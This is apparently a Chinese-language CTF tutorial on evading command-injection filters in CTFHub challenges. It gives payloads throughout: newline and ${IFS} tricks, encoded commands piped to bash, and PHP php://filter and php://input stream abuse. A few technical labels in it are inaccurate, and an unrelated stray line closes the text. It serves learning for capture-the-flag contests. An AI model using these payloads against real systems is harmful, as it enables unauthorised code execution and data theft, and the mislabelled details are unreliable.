CTFHub RCE绕过艺术:从基础过滤到高级对抗实战指南
在CTF竞赛中,远程代码执行(RCE)类题目往往是最能体现选手技术实力的战场之一。面对各种精心设计的过滤机制,如何灵活运用系统特性与编程技巧实现完美绕过,成为区分普通玩家与高手的关键分水岭。本文将系统梳理Linux环境下常见的命令执行限制场景,通过CTFHub经典题目还原真实攻防对抗过程,带你掌握从基础绕过到高阶利用的完整知识体系。
1. 命令分隔符的七十二变
当分号、管道符等常见分隔符被过滤时,真正的黑客会展现出惊人的创造力。在Linux系统中,至少有六种等效的命令分隔方式:
- 换行符:
%0a(URL编码)或直接换行 - 逻辑运算符:
&&(与)、||(或) - 进程替换:
$(cmd)或反引号 - 花括号扩展:
{cmd1,cmd2} - 注释干扰:
cmd1 #注释%0a cmd2 - 变量拼接:
a=cmd1;b=cmd2;$a$b
以CTFHub"过滤运算符"题目为例,当| & ;都被禁止时,可以构造:
127.0.0.1%0a base64 flag_27475302269053.php这里的%0a作为换行符完美替代了传统分隔符,通过URL编码还能绕过简单的字符串检测。
注意:不同Shell环境对分隔符的解释可能存在差异,建议测试时明确声明
/bin/bash或/bin/sh
2. 空格替代方案大全
空格过滤是最基础的防御手段,但绕过方式也最为丰富。下表对比了各种替代方案在不同场景下的适用性:
| 替代方案 | 适用场景 | 示例 | 检测难度 |
|---|---|---|---|
| ${IFS} | Bash环境通用 | cat${IFS}flag.txt | 中等 |
| < 或 > | 文件重定向时 | cat<flag.txt | 低 |
| %09 | URL编码(制表符) | cmd%09arg1%09arg2 | 高 |
| {cmd,arg} | 花括号扩展 | {cat,flag.txt} | 极高 |
| 变量截断 | 复杂过滤环境 | X=$'cat\x20flag';$X | 极高 |
实战中曾遇到一个有趣案例,题目过滤了所有空白字符但允许特殊符号:
cmd=echo${IFS}"payload"|base64${IFS}-d|bash通过环境变量与Base64编码的组合,成功构建了无空格命令链。
3. 关键命令被禁后的备选方案
当cat、ls等常用命令被加入黑名单时,真正的挑战才开始。聪明的选手会从以下几个维度寻找突破口:
3.1 同类命令替换
- 文件读取:
tac、more、less、head、tail、nl - 目录查看:
dir、find、tree - 命令执行:
exec、eval、source
3.2 编程语言特性
- PHP:
file_get_contents()、highlight_file() - Python:
open().read()、os.popen() - Perl:
open(FH,"flag");print <FH>
3.3 系统工具复用
# 使用grep读取文件 grep '' /flag # 使用sed输出内容 sed -n '1,$p' /flag # 使用awk打印全文 awk '{print}' /flag在CTFHub"过滤cat"题目中,选手可以这样绕过:
127.0.0.1 & more flag_31842143531286.php | base64通过more命令配合管道,既绕过了关键词检测又实现了内容保护。
4. 编码与协议流的魔法
当常规手段全部失效时,编码转换和协议处理往往能创造奇迹。现代系统提供的多种I/O流处理器就像黑客的瑞士军刀:
4.1 Base64套娃技巧
# 多层编码规避简单检测 import base64 payload = base64.b64encode(b'cat /flag').decode() double_payload = base64.b64encode(payload.encode()).decode()4.2 十六进制转换艺术
# 将命令转为十六进制执行 echo 636174202f666c6167 | xxd -r -p | bash4.3 PHP流协议实战
# 使用filter链进行内容提取 php://filter/convert.base64-encode/resource=flag.php # 输入流直接执行代码 php://input + POST: <?php system('ls');?>在CTFHub"读取源代码"题目中,通过filter协议实现源码泄露:
http://challenge/?file=php://filter/read=convert.base64-encode/resource=../../flag5. 综合过滤下的降维打击
当遇到多重过滤时,需要采用组合拳突破防御。某次实战中遇到的过滤规则包括:
- 禁止:
| & ; cat flag ctfhub 空格 - 允许:字母数字、部分符号
最终构造的payload如下:
?ip=127.0.0.1%0acd${IFS}f***_is_here${IFS}%0abase64${IFS}f*****_246102198712264.php这个解决方案融合了:
%0a作为命令分隔符${IFS}替代空格- 通配符
*绕过关键词检测 - 相对路径跳转目录
在CTF赛场上,真正的强者不是拥有最多工具的人,而是最了解系统本质的探索者。当你深入理解每个字符在解释器眼中的真实含义时,任何过滤规则都将成为展示创造力的舞台。记住,系统设计者的"漏洞"往往只是他们想象力的边界,而你的任务就是看到边界之外的可能性。
设计,如何让你的工业系统更可靠?)
)
